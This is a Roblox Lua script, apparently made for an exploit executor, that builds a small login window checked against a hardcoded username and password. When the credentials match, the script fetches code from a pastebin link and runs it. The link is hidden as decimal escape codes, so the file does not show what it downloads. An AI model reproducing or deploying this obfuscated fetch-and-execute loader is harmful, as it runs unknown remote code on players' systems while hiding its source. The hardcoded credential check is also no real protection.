-- Gui to Lua
-- Version: 3.2

-- Instances:

local keyscreen = Instance.new("ScreenGui")
local keyframe = Instance.new("Frame")
local loginlabel = Instance.new("TextLabel")
local userlabel = Instance.new("TextLabel")
local passlabel = Instance.new("TextLabel")
local userbox = Instance.new("TextBox")
local passBox = Instance.new("TextBox")
local enterbutton = Instance.new("TextButton")
local correctimage = Instance.new("ImageLabel")
local correctimage_2 = Instance.new("ImageLabel")

--Properties:

keyscreen.Name = "keyscreen"
keyscreen.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui")
keyscreen.ZIndexBehavior = Enum.ZIndexBehavior.Sibling

keyframe.Name = "keyframe"
keyframe.Parent = keyscreen
keyframe.Active = true
keyframe.BackgroundColor3 = Color3.fromRGB(25, 25, 25)
keyframe.BorderColor3 = Color3.fromRGB(25, 25, 25)
keyframe.BorderSizePixel = 20
keyframe.LayoutOrder = 66
keyframe.Position = UDim2.new(0.324758738, 0, 0.232136518, 0)
keyframe.Size = UDim2.new(0, 210, 0, 333)
keyframe.Active = true
keyframe.Draggable = true

loginlabel.Name = "loginlabel"
loginlabel.Parent = keyframe
loginlabel.BackgroundColor3 = Color3.fromRGB(25, 25, 25)
loginlabel.BorderColor3 = Color3.fromRGB(25, 25, 25)
loginlabel.Position = UDim2.new(-0.0845798776, 0, -0.0082022732, 0)
loginlabel.Size = UDim2.new(0, 210, 0, 51)
loginlabel.Font = Enum.Font.SourceSans
loginlabel.Text = "Login"
loginlabel.TextColor3 = Color3.fromRGB(255, 255, 255)
loginlabel.TextScaled = true
loginlabel.TextSize = 14.000
loginlabel.TextWrapped = true

userlabel.Name = "userlabel"
userlabel.Parent = keyframe
userlabel.BackgroundColor3 = Color3.fromRGB(25, 25, 25)
userlabel.BorderColor3 = Color3.fromRGB(25, 25, 25)
userlabel.Position = UDim2.new(0.000245451927, 0, 0.208649814, 0)
userlabel.Size = UDim2.new(0, 172, 0, 40)
userlabel.Font = Enum.Font.SourceSans
userlabel.Text = "username"
userlabel.TextColor3 = Color3.fromRGB(255, 255, 255)
userlabel.TextScaled = true
userlabel.TextSize = 14.000
userlabel.TextWrapped = true

passlabel.Name = "passlabel"
passlabel.Parent = keyframe
passlabel.BackgroundColor3 = Color3.fromRGB(25, 25, 25)
passlabel.BorderColor3 = Color3.fromRGB(25, 25, 25)
passlabel.Position = UDim2.new(0.000245451927, 0, 0.549098015, 0)
passlabel.Size = UDim2.new(0, 172, 0, 40)
passlabel.Font = Enum.Font.SourceSans
passlabel.Text = "password"
passlabel.TextColor3 = Color3.fromRGB(255, 255, 255)
passlabel.TextScaled = true
passlabel.TextSize = 14.000
passlabel.TextWrapped = true

userbox.Name = "userbox"
userbox.Parent = keyframe
userbox.BackgroundColor3 = Color3.fromRGB(35, 35, 35)
userbox.Position = UDim2.new(0.0218889341, 0, 0.38986814, 0)
userbox.Size = UDim2.new(0, 163, 0, 35)
userbox.Font = Enum.Font.SourceSans
userbox.Text = ""
userbox.TextColor3 = Color3.fromRGB(255, 255, 255)
userbox.TextSize = 14.000

passBox.Name = "passBox"
passBox.Parent = keyframe
passBox.BackgroundColor3 = Color3.fromRGB(35, 35, 35)
passBox.Position = UDim2.new(0.0218889341, 0, 0.707957804, 0)
passBox.Size = UDim2.new(0, 163, 0, 35)
passBox.Font = Enum.Font.SourceSans
passBox.Text = ""
passBox.TextColor3 = Color3.fromRGB(255, 255, 255)
passBox.TextSize = 14.000

enterbutton.Name = "enterbutton"
enterbutton.Parent = keyframe
enterbutton.BackgroundColor3 = Color3.fromRGB(25, 25, 25)
enterbutton.BorderColor3 = Color3.fromRGB(25, 25, 25)
enterbutton.Position = UDim2.new(-0.0580357127, 0, 0.864048302, 0)
enterbutton.Size = UDim2.new(0, 200, 0, 50)
enterbutton.Font = Enum.Font.SourceSans
enterbutton.Text = "enter"
enterbutton.TextColor3 = Color3.fromRGB(255, 255, 255)
enterbutton.TextScaled = true
enterbutton.TextSize = 14.000
enterbutton.TextWrapped = true
enterbutton.MouseButton1Down:connect(function()
--user here
	if userbox.Text == "reimer" and passBox.Text == "xd" then

		correctimage.Visible = true
		correctimage_2.Visible = true

  wait(1)
keyscreen:Destroy()
loadstring(game:HttpGet("\104\116\116\112\115\58\47\47\112\97\115\116\101\98\105\110\46\99\111\109\47\114\97\119\47\102\52\81\118\97\88\112\50\10",true))()


	end

end)


correctimage.Name = "correctimage"
correctimage.Parent = enterbutton
correctimage.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
correctimage.BackgroundTransparency = 6.000
correctimage.Position = UDim2.new(0.88499999, 0, -1.34000003, 0)
correctimage.Size = UDim2.new(0, 50, 0, 67)
correctimage.Image = "http://www.roblox.com/asset/?id=5314809902"
correctimage.Visible = false

correctimage_2.Name = "correctimage"
correctimage_2.Parent = enterbutton
correctimage_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
correctimage_2.BackgroundTransparency = 6.000
correctimage_2.Position = UDim2.new(0.889999986, 0, -3.0999999, 0)
correctimage_2.Size = UDim2.new(0, 50, 0, 67)
correctimage_2.Image = "http://www.roblox.com/asset/?id=5314809902"
correctimage_2.Visible = false
